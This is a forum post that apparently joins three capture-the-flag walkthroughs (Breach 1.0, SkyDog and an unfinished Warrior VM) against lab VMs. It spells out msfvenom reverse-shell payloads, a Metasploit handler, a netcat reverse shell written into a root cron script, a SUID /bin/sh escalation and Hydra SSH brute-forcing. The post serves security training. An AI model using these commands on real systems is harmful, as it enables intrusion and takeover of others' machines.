04-24-2020, 03:10 PM
| 0 | 0 | ||
Breach 1.0 is a first VM in a multi-part series, it is meant to be for beginner to intermediate boot2root/CTF challenge. It is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adapter to this subnet.
nmap -Pn 192.168.110.140
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-61QczON_aus/V9Qq9TcG0jI/AAAAAAAANms/KKYP_NY8N6EsaQk_8OCMXxtc561FAakoQCLcB/s1600/1.png?w=687&ssl=1)
Now let’s start nikto :
nikto -h 192.168.110.140
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-4ToktfxPnQc/V9Qq-myCR7I/AAAAAAAANnA/L_i4OxzotK4zGbNPixg45cL5qa9__t8iQCEw/s1600/2.png?w=687&ssl=1)
Nikto proved to be useless in this case. So now let’s divert our attention to Port 80 which is most known and open so we will try by investigating the said port and do to so open the target IP into your browser.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-KlZkMTe-bfU/V9Qq_KB2VmI/AAAAAAAANnE/El_vHB7jy98hdK7YLnw4B--gWLxpeFo_QCEw/s1600/3.png?w=687&ssl=1)
On the home page you will find an image with some dialogues/comments. Open the page source and you will find a base64 encoded code:
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-0HPHh3E8lEM/V9Qq_UrbgbI/AAAAAAAANnI/zH47iaESPZMUCzlqBctNymPSzEO9dKBvwCEw/s1600/4.png?w=687&ssl=1)
<! ——Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo —–>
Decode this code using a Add-On HackBar for Mozilla. Enable this Add-on and click on its Encoding tab then select Decode option. After this it will ask you for the string that you want to decode. Paste the code there and click on Ok
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-SO_P0XCpGCU/V9Qq_6Oxm7I/AAAAAAAANnM/6Z_sTOYUa7ghAIxDOQGYIX0o4pY2nCxaACEw/s1600/5.png?w=687&ssl=1)
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-V-ML7TaZ6ok/V9Qq_1b05SI/AAAAAAAANnQ/rXuABqziNMAxOPcgLasi50XrqZAnTUaWQCEw/s1600/6.png?w=687&ssl=1)
Further decode it with the similar method and you will have one username and password.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-icsvCPWT4KM/V9QrAIrWxUI/AAAAAAAANnU/sVvo19R7l9Aylj_7mld50mAyoLQZ5ckLACEw/s1600/7.png?w=687&ssl=1)
Now go back to the home page and click on the image. It will redirect you to another page.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-JkyrzAjUtJU/V9QrAnu0lAI/AAAAAAAANnY/CaF-GIfQGPcSyTsgkIFlkRljexXhP4hVQCEw/s1600/8.png?w=687&ssl=1)
We tried and open every tab but found nothing except the Employee Portal tab. clicking on Employ Portal tab will open a log in page. Log into it by username and password that you have just decoded using Hack Bar.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-r2URCwlyzok/V9Qq9SODRxI/AAAAAAAANmw/tEGkedkUDjgtVQRftoiekBB3QiPbT2BKwCEw/s1600/10.png?w=687&ssl=1)
Once you are logged in, you will we that there are three messages in the inbox. Open each message one by one as we may find a clue in it.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-A8avobsMVwU/V9Qq9cTY0WI/AAAAAAAANmo/2pKvdfH92-ItCTuWwo9YDW3ygPgt6JlHACEw/s1600/11.png?w=687&ssl=1)
In the first mail a user is simply sending a message to another user named peter. And as we found no clue in it we may move forward to the second mail.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-MqUnCRSsnR0/V9Qq94I8I_I/AAAAAAAANm4/ZCLD2xZ_BIA_my2sS0yP7U3RZ-E5ybgygCEw/s1600/12.png?w=687&ssl=1)
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-hZbHSS0ZBb8/V9Qq-O0d_DI/AAAAAAAANm0/5-1VVC_K35gfSNPOFVYZowjBOEO5dJjEwCEw/s1600/13.png?w=687&ssl=1)
Moving onto the third mail you will find that there is a URL mentioned and they are talking about a SSL certification. So let’s not wait any longer and open the URL first.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-PykwLZbzQ5U/V9Qq-efUekI/AAAAAAAANm8/GmpWaO7xhmgANhRdxBDvxuTv9Ft9AAZMwCEw/s1600/14.png?w=687&ssl=1)
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-fKMDPeteZpE/V9QsOO0hPrI/AAAAAAAANno/HxsW5T5_gU0doyTOgn9rWmoqkjG5OMa4wCLcB/s1600/15.png?w=687&ssl=1)
Now let’s look for SSL in the search bar and see what it has to offer.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-BwToq6IEfOw/V9QsOAPunTI/AAAAAAAANnk/_pqj-aQTxCgkjP2yM_4Nc2dTLWCyW9bggCEw/s1600/17.png?w=687&ssl=1)
There is in fact an SSL certification present. Open it
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-6_MUz202X74/V9QsOMar57I/AAAAAAAANng/kM9CsVJy8WI3EpMqxOxlX5zsUAJZSl-BQCEw/s1600/18.png?w=687&ssl=1)
In the SSL certificate you will find a URL.
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-vTzN58hXIkI/V9QsOvXcycI/AAAAAAAANnw/NnorsO3JzRAF4I1KIjvLbBOidb51I5zeACEw/s1600/19.png?w=687&ssl=1)
Similarly, open the URL and it will ask you to download a file.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-cRh40iwj2uE/V9QsOxfLHsI/AAAAAAAANns/x_j97xjWkdgaY_zQ4EJmzg_ysLN7r_IagCEw/s1600/20.png?w=687&ssl=1)
Once you have downloaded the file. Open it with wireshark
Now that the file is opened, try to read it by right clicking on the file and then selecting follow >> TCP stream. This is a normal method to read it but as you can see via this method you can’t read the file as its encrypted and from earlier we know that SSL certificate will allow us to read it.
But now the problem is that SSL option is not activated. So now we have to find a way to activate it. Let’s have look on the files that wireshark is providing. You can see that the most communication is taken place on the port 8443. This port is used for tomcat and the file we downloaded earlier, namely .keystore, might had all the certificates because we recall while downloading this keystore file mentioned something about tom cat which means our intuition is correct.
Now doing a lot of research on internet on security stack we found the keystore’s proprietary format (called “JKS”) to standardized format PKCS12.
keytool -importkeystore -srckeystore keystore -destkeystore mykeystore.p12 -deststoretype PKCS12 -srcalias tomcat
In passwords we have put tomcat as it the general default password. Now the file is ready to import.
So, now to activate it simply go to Edit menu from the menu bar and select Preferences from the drop down menu.
A dialog box will open, select protocols option and then select SSL and then click on Edit button.
![[Image: 23.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-2UDQMUm8hOk/V9QsO-L2B5I/AAAAAAAANn0/ISmUlaEU2a4U5PAcV_mUSCDHomPjarmnQCEw/s1600/23.png?w=687&ssl=1)
Another dialog box will open. Here, give IP address of the target and port number 8443 along with the path of keystore file and the password.
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-KcBDS_dHV10/V9QsPa7FkpI/AAAAAAAANn4/EqD7Vj-RgLwLB5i2w_NrJ0dd3mK2GrZkgCEw/s1600/24.png?w=687&ssl=1)
Now we have activated SSL so right click on the file and choose the option Follow and then select SSL stream.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-TyiuPsBP4uA/V9QsPWtTv7I/AAAAAAAANn8/OAebOW1nvhEWxRI0bFBCnBlxq8Z9QGwPwCEw/s1600/25.png?w=687&ssl=1)
Finally, now you can read the file. In the file you will again find a base64 code. Decode it in the similar way using hack bar.
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-wl8kSZy-a88/V9QsPpSO7oI/AAAAAAAANoA/0_NvVsq5Zi0z3z2Q5llaw2G7FGuBRiGJgCEw/s1600/26.png?w=687&ssl=1)
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-JtiedzXRd4c/V9QsPz6fDnI/AAAAAAAANoE/IwB5yDi0z4Am7MR-LhLDfauSsF0PyYMDgCEw/s1600/27.png?w=687&ssl=1)
Traversing the file on wireshark some more will show you and URL as shown:
![[Image: 28.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-a-jfBq8WfDs/V9QsQEHSpXI/AAAAAAAANoI/BksqVw8RE1YFIHYw8wPmRkUHM_3aFmvVQCEw/s1600/28.png?w=687&ssl=1)
Opening this URL on the browser will open a software foundation page made in java. On this page you can find a browse option which means we can upload a malicious file here.
![[Image: 29.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-hNkixwJlAKU/V9QsQbFgrgI/AAAAAAAANoM/9kHeWSs5C6AffYEvznjCZURhaTmQrtOuwCEw/s1600/29.png?w=687&ssl=1)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war
![[Image: 30.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-iG8fkx-xsMQ/V9QsQhijyEI/AAAAAAAANoQ/RMtC2US8DzgBcaPndMkGNo_ceWHDFuB2QCEw/s1600/30.png?w=687&ssl=1)
Go to the browse option now and upload your file.
![[Image: 31.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-RpeX6ca5ba4/V9QtOL1SoBI/AAAAAAAANoY/fQ04LH1gBFIX3HASetWIDZpomVru6rOXACLcB/s1600/31.png?w=687&ssl=1)
The file is uploaded.
![[Image: 32.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-v0B86EDjBus/V9QtOO7SnrI/AAAAAAAANoc/BvQ2ktofe6cEtIMbyX-J01IMiPNcSHMrwCEw/s1600/32.png?w=687&ssl=1)
Now before clicking on the file open metasaploit and type ;
use exploit/multi/handler
set payload java/meterpreter/rever_tcp
set lhost 192.168.110.128
set lport 4444
exploit
Click the file once you hit enter and you will have you meterpreter’s session in no time.
Now go to the shell and import the python file to have the control of terminal and for that type :
shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
1
2
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Once you reach the terminal type the following command to see the details:
ls -lsa
As we found nothing in it we went back by typing :
cd ..
![[Image: 33.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-8jwvBvVWBAA/V9QtPhTKxnI/AAAAAAAANoo/oIS9VViB8E0H9uCLqYK5k-wskGGNZTAqwCEw/s1600/33.png?w=687&ssl=1)
Then go to home and into the Milton and read the file which may have our flag. Do this with the following steps:
cd home
ls -lsa
cd milton
ls -lsa
cat some_script.sh
![[Image: 34.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-h-XgptFSuPw/V9QtSS6MDRI/AAAAAAAANo0/7q07BnCNvSos7smeLXrAZLly5b7PgpThgCEw/s1600/34.png?w=687&ssl=1)
LOL! We are trolled as there was no flag here. Now that we found nothing here we were back to square one which means we then started search everything again thoroughly. And then we found an image called bill.png.
![[Image: 35.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-HyxQq3Lm1wo/V9QtPQ9KTBI/AAAAAAAANok/mpJoLglyDnUSoseRLuyKW8V52KxgmVucgCEw/s1600/35.png?w=687&ssl=1)
exiftool bill.png
![[Image: 36.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-7K8nyOujf9o/V9QtQBqG7kI/AAAAAAAANos/PM7kYXG8sM0GUjj1g-nTrHABr-66s-rIwCEw/s1600/36.png?w=687&ssl=1)
We found a password here i.e. coffeestains
Then go to the passwd file :
cat /etc/passwd
Then su and give the password as coffeestains :
su blumbergh
And then look for the ID’s by typing :
id
![[Image: 37.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-zsqqekMARrs/V9QtTdoAQfI/AAAAAAAANo8/HhbSt5NCCDILHSUjLVwXIkVPoRdir3KpgCEw/s1600/37.png?w=687&ssl=1)
On further exploring you will find a file called /usr/share/cleanup/tidyup.sh. It says in this file that it runs every three minutes in order to defend itself from hackers. So now, as we have root’s access we should be able to modify it and so type:
echo “nc -e /bin/bash 192.168.110.128 8443” > shell.txt
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
cat /usr/bin/tee /usr/share/cleanup/tidyup.sh
![[Image: 38.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-jl8d9PfePM0/V9QtRaEy5bI/AAAAAAAANow/exgD3UlBaLUjaQcz6Qs8H1kc6jqR-l9hgCEw/s1600/38.png?w=687&ssl=1)
nc -lvv -p 8443
![[Image: 39.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Y0THrFkjfeo/V9QtSieqWoI/AAAAAAAANo4/OyO9CzYjC6kKVh_PAm-5XgALyOpqdm20QCEw/s1600/39.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another CTF challenge “SkyDog” which is design by Mr. James Bower. The purpose of this CTF is to find all six flags hidden throughout the server by the hacking network and system services. This can be achieved without hacking the VM file itself. Capturing these flags is quite fun and interesting. Before starting off I am listing the following hints of all 6 flags that we know of beforehand and we have to find out their answers.
Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 another Day at the Office
Flag #6 Little Black Box
Penetrating Methodologies:
- Network Scanning (Netdiscover, Nmap)
- Inspecting web services for (Flag 1, 2, 3 & 4)
- Get flag 1st from inside SkyDogCon_CTF.jpg (ExifTool)
- Get flag 2nd using robot.txt
- Get flag 3rd from whistler.zip
- Generating Dictionary for web directory (Cewl)
- Directory brute force (Dirb)
- Get flag 4th from play inside PlayTronics
- Get the .pcap file and grab an audio file (Wireshark)
- SSH Brute force Attack (Hydra)
- Spawn TTY shell of the machine and Get flag 5th (SSH login)
- Writable File privilege escalation
- Get the Root Access and Capture the flag 6th
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-sLN-0SEJj4w/W4OZCoG4y9I/AAAAAAAAZ9s/18NdbsUi_FQp2_CzsfBrARy30VseZltawCEwYBhgL/s1600/1.png?w=687&ssl=1)
Our target is 192.168.1.102. Scan the target with nmap.
nmap -A 192.168.1.102
1
nmap -A 192.168.1.102
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-cVyfyqVSdMU/W4OZE085PCI/AAAAAAAAZ_Y/2U8DwhNENI8z6--raE7SMe2iYYQtkNJhQCEwYBhgL/s1600/2.png?w=687&ssl=1)
As the result, we can see that port 22 and 80 are open. Therefore, open the IP in the browser. And as you can see there is nothing but the image of CTF on the webpage.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Wp7XTpaNSAU/W4OZGvc-_XI/AAAAAAAAZ_U/dQBZnfcG93ATLQzsd-AHjTLOx7JdTDRcwCEwYBhgL/s1600/3.png?w=687&ssl=1)
Download the image and read it with ExifTool.
exittool SkyDogCon_CTF.jpg
1
exittool SkyDogCon_CTF.jpg
Reading the image we will find the 1st flag.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-m8yhZ5PJDKg/W4OZG-4DdoI/AAAAAAAAZ_Y/Jj-pt4D5sOM6zs9LpmAVgjvcnaJqK9G0gCEwYBhgL/s1600/4.png?w=687&ssl=1)
The first flag is in MD5 hash value and we will crack the hash value with online MD5 cracker. The value will make up to the word Welcome Home which is approximately close to author description for the 1st flag.
Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)
Flag 1: flag {abc40a2d4e023b42bd1ff04891549ae2}: Welcome Home
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-GgU4pV6nkX4/W4OZHBihbUI/AAAAAAAAZ_c/nRTuroGyUQgYWoiaBbJxGlQLx8U4oGbjQCEwYBhgL/s1600/5.png?w=687&ssl=1)
If you will go back to nmap scan result, then you will observe there is a robot.txt file in which 15 entries are allowed and 252 are disallowed.
And yes! Opening it in the browser we found our 2nd flag. So let’s crack the MD5 value of the flag.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-fItWlV8X4Gs/W4OZHtHl4pI/AAAAAAAAZ_o/gSuoMXoKpEsujbkg6IOLU4vO0HzWfu99wCEwYBhgL/s1600/6.png?w=687&ssl=1)
On cracking the value of Flag #2 is Bots
Flag #2 When do Androids Learn to Walk?
Flag 2: flag {cd4f10fcba234f0e8b2f60a490c306e6}: Bots
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-Bi88FUoMXEE/W4OZHtrukTI/AAAAAAAAZ_g/0BD_qZhA2OgkaQ0IVP3qXtA9LR7Qfnq6wCEwYBhgL/s1600/7.png?w=687&ssl=1)
After cracking the flag #2 we explored robots.txt some more and upon opening all the allow directories one by one there was one which opened i.e. /Setec
Here it comes up with the following image with title “Too many secrets” therefore I decided to review its source code.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-ivmba0G7kwM/W4OZH05NXkI/AAAAAAAAZ_k/SWFHViZL56cTqfhAu-irNQLDaSVs3aq2gCEwYBhgL/s1600/8.png?w=687&ssl=1)
So with help of curl, we inspect following URL and found an /Astronomy directory from here.
curl -v
[To see content please register here]
1
curl -v
[To see content please register here]
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-wEfPVTD2nvg/W4OZIB0u3PI/AAAAAAAAZ_o/G1c23ETOdLw3KR_ajnGsTLHdp4prfPs1QCEwYBhgL/s1600/9.png?w=687&ssl=1)
Now open this directory by typing URL:
[To see content please register here]
and here, you will find whistler.zip. Download the file.![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-okEEq61A9h4/W4OZCtI_HSI/AAAAAAAAZ_Y/eu-lldikRUY6jZZSRlFCLMcaN-I6h942ACEwYBhgL/s1600/10.png?w=687&ssl=1)
This file is password protected therefore we need to find the password so that we can unzip this file. Now apply dictionary attack to find its password with the help of rockyou.txt and for that type:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt Whistler.zip
1
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt Whistler.zip
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-EZb9nmgv2aM/W4OZCyVa1rI/AAAAAAAAZ_Y/Rx6b6NANvL89tC9Qcmvy-fnnEI_qPzpywCEwYBhgL/s1600/11.png?w=687&ssl=1)
And you will find the password i.e. yourmother and now, of course, unzip the file:
unzip whistler.zip
1
unzip whistler.zip
After unzipping you will find Flag #3 and some other file with a hint. First, open flag:
cat flag.txt
1
cat flag.txt
You will have your flag again in MD5 value. Crack it with similar method.
Flag #3 Who Can You Trust?
Flag3: flag{1871a3c1da602bf471d3d76cc60cdb9b}: yourmother
Now open the other file:
cat QuesttoFindCosmo.txt
1
cat QuesttoFindCosmo.txt
This file will give you a hint regarding OSINT.
OSINT: Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.
That means we have to find something related to OSINT. If you recall there was a similar thing in the movie Sneakers and so we will use the movie and apply the technique of cewl here. CEWL lets us create a dictionary file using a URL and here we will use the URL of the movie to help us create the dictionary file and therefore type:
cewl --depth 1
[To see content please register here]
-w /root/Desktop/dict.txt1
cewl --depth 1
[To see content please register here]
-w /root/Desktop/dict.txt![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nwPLwC6YMJE/W4OZDNhJl5I/AAAAAAAAZ_k/TXm2vXzq0sUo7u703AwQFdueeYwa71_NQCEwYBhgL/s1600/12.png?w=687&ssl=1)
My next step is abusing web directories by using the above dictionary “dict.txt” to get some useful directories name with help of dirb command.
dirb
[To see content please register here]
dict.txt1
dirb
[To see content please register here]
dict.txt![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-2ZJcgcP0jS4/W4OZDkaDs2I/AAAAAAAAZ_Y/Tt7cH1RR-3gDvzncv0FnRzvpjTOAXVxVQCEwYBhgL/s1600/13.png?w=687&ssl=1)
This command will show us the following directories:
- PlayTronics
- Sectec
- Astronomy
And to our luck, we found Flag.txt in the PlayTronics directory.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Md7bpeJ82_4/W4OZDjBdiII/AAAAAAAAZ_U/dblcQvrRx68TESBLjbtp0jwuWQXBhm1nACEwYBhgL/s1600/15.png?w=687&ssl=1)
We got the 4th flag from here, lest crack it to get the value of Flag# 4.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-BMs8vA-VpcQ/W4OZDzedygI/AAAAAAAAZ_U/J-AkTMd4EBQVsJTkbEc7JT2yC3ky_2aMQCEwYBhgL/s1600/16.png?w=687&ssl=1)
Crack the flag with a similar method and you will have the Flag #4 value i.e. leroybrown
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag 4 : flag{c07908a705c22922e6d416e0e1107d99}: leroybrown
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-GZ08ulu3jI8/W4OZEE0CjmI/AAAAAAAAZ_Q/8eRrYTvl__kwwtr6SHPuESsOqsk2bZlKwCEwYBhgL/s1600/17.png?w=687&ssl=1)
In PlayTronics we also found a file with .pcap extension. Open that file with Wireshark. And upon studying its data carefully you will find an audio file. Download audio file.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-IPIy4uFPN-U/W4OZEEk1XDI/AAAAAAAAZ_o/Gq7OZwVWYnoI6Vf1zqjvsqci_qbJUZdsQCEwYBhgL/s1600/18.png?w=687&ssl=1)
Upon playing the file you will find it says only one word i.e. werner brandes. Now this “werner brandes” word can be our user name. So make a text file with possible combinations of username using the word “werner brandes”. Also, make a text file for passwords containing all the flag values that we just found.
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-nlYfovEt69s/W4OZEVAxaDI/AAAAAAAAZ_U/2s3I5LGhkHQABolDfTRrwiP0_Eaxj4gEgCEwYBhgL/s1600/19.png?w=687&ssl=1)
hydra -v -L dict.txt -P dict.txt.txt 192.168.1.102 ssh
1
hydra -v -L dict.txt -P dict.txt.txt 192.168.1.102 ssh
As you can observe that we had successfully grabbed the SSH username as wernerbrandes and password as leroybrown.
![[Image: 20.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-_9fud0m0RZQ/W4OZFALQ96I/AAAAAAAAZ_U/O8ew9kdUsq8iGg8bPg8C6tpX_0R-e8zMwCEwYBhgL/s1600/20.1.png?w=687&ssl=1)
Now that you have username and password login with SSH
ssh [email protected]
1
ssh [email protected]
And fortunately, we also found Flag #5 in MD5 value.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-zki8AmXwsEI/W4OZFH799aI/AAAAAAAAZ_Y/9lUnUj12mvUWdQ0YrZG2KbuuSKOHG089QCEwYBhgL/s1600/20.png?w=687&ssl=1)
Crack it with the same method and the will turn up to be Dr. Gunter Janek
Flag #5 another Day at the Office
Flag 5: flag{82ce8d8f5745ff6849fa7af1473c9b35}: Dr. Gunter Janek
![[Image: 21.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-PGwyMGeCZNo/W4OZFnKCgFI/AAAAAAAAZ_g/XxxCbHaZnroereY6bxW26ufs9O7G2zjWQCEwYBhgL/s1600/21.png?w=687&ssl=1)
Now let’s find a writable file and for that type:
find / -writable -type f
1
find / -writable -type f
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-2-Mvkw3kiW0/W4OZFlPSkxI/AAAAAAAAZ_Q/tK0PgRo-XQYun3OmFCUq2vzRMJvdFn0UQCEwYBhgL/s1600/22.png?w=687&ssl=1)
So we will open the sanitizer.py file with the following steps:
cd /lib
cd log
nano sanitizer.py
1
2
3
cd /lib
cd log
nano sanitizer.py
So here the following script was added by admin to clean up all junk file from inside /tmp and these type of files depends upon specific time interval for executions.
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-0GC9kz6wJ08/W4OZGC-7i-I/AAAAAAAAZ_o/pN4hGu0K40EggmWJZtraC_hkcapaDohdQCEwYBhgL/s1600/25.png?w=687&ssl=1)
Now replace “rm -r /tmp/*” from the following line as given below code which will enable SUID bit for /bin/sh after some time.
os.system('chmod u+s /bin/sh')
1
os.system('chmod u+s /bin/sh')
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-iqduVMdMJ40/W4OZGNHx6bI/AAAAAAAAZ_c/TXaybgy26mgSXQtniT_UJewj0LlHxO8ZACEwYBhgL/s1600/26.png?w=687&ssl=1)
Now let go to bin /bin/sh and try to get root access with help of the following command.
/bin/sh
id
whoami
ls
cd BlackBox
1
2
3
4
5
/bin/sh
id
whoami
ls
cd BlackBox
And here is our 6th the last flag lets capture it.
cat flag.txt
1
cat flag.txt
Crack the value of the flag with the same method.
Flag #6 Little Black Box
Flag 6: flag {b70b205c96270be6ced772112e7dd03f}: CongratulationsYouDidIt
HURRAYYY!!! All the six flags have been captures. And this CTF is completed.
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-QvbjHm1lMyE/W4OZGNZFsFI/AAAAAAAAZ_g/jDoFa2gcTsEJY6z2oS3PynexlEEYGVeJwCEwYBhgL/s1600/27.png?w=687&ssl=1)
This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.
Download the VM from –>
[To see content please register here]
Breaching Methodology
- Network Scanning (Nmap)
- Recon (Nikto)
- LFI due to allow_url_inclued
- Install Tamper data (Firefox plugin)
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Open UNIX wildcard text file
- Privilege Escalation (cron job)
- Import python one-liner for proper TTY shell
- Take root access and capture the flag
As always start off by locating the target with the netdiscover command. Our target is 192.168.1.100. Now we will scan our target with nmap to know all about its ports.
nmap -p- -A 192.168.1.100
1
nmap -p- -A 192.168.1.100
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-X-2BXSQw-iQ/WuLLK0S4BoI/AAAAAAAAWc8/psO6oHtaW_okx0zCOXxcXIhwDmROWM3QACLcBGAs/s1600/1.png?w=687&ssl=1)
Since port 80 was open for http, therefore, we had explored target IP on the browser but didn’t get any useful information. So further we have decided to use Nikto against target URL.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-md5keRyGIqk/WuLLMCUdLPI/AAAAAAAAWdQ/W8CdJqZ6N6gzWpes7ujyfsiFANwqXeK0gCLcBGAs/s1600/2.png?w=687&ssl=1)
To know more about our target we will use Nikto.
nikto -h 192.168.1.100
1
nikto -h 192.168.1.100
As per result dumped by Nikto, it tells something about info.php, let verify it.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-7443JxRUdQE/WuLLMLkt-nI/AAAAAAAAWdM/ywcl2m-WLm0BOnDZqweoHAG8o1re8SZ5gCLcBGAs/s1600/3.png?w=687&ssl=1)
So when we have browsed
[To see content please register here]
, we found “allow_url_include” is “on” which means we can call any local or remote file and hence it is pointing towards LFI and RFI vulnerability.![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-D87L7AMnxPc/WuLLMmOImdI/AAAAAAAAWdY/hfwfTP3aoAcwEhye3jgdt8YfunAU9xL6gCLcBGAs/s1600/4.png?w=687&ssl=1)
Upon finding the said vulnerability our step was clear i.e. we had use Tamper data(Firefox plugin).
So go to Tools on the menu bar and select Tamper data, When the Tamper Data opens click on Start Tamper.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-YXNtCZxDt7Q/WuLLMqbHdzI/AAAAAAAAWdU/szv-IIqpMhc11_MYEzGgRY6tJwc7gEL5QCLcBGAs/s1600/5.png?w=687&ssl=1)
Now generate the PHP code with the help of which we will have our meterpreter session and to generate the code type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
Copy the code from <?php to die() and save it on the file with extension .php, we have saved it as shell.php on the desktop and run command python SimpleHTTPServer 80 for transferring it into target’s system.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-boYCUCpPZK8/WuLLM_eLthI/AAAAAAAAWdc/SNCUmOvLVV4ekvNj2wIzbnYpmS57LCX9wCLcBGAs/s1600/6.png?w=687&ssl=1)
Then on Tamper Data give the path of the file without the extension in the text box adjacent to the route. For example type:
[To see content please register here]
?1
[To see content please register here]
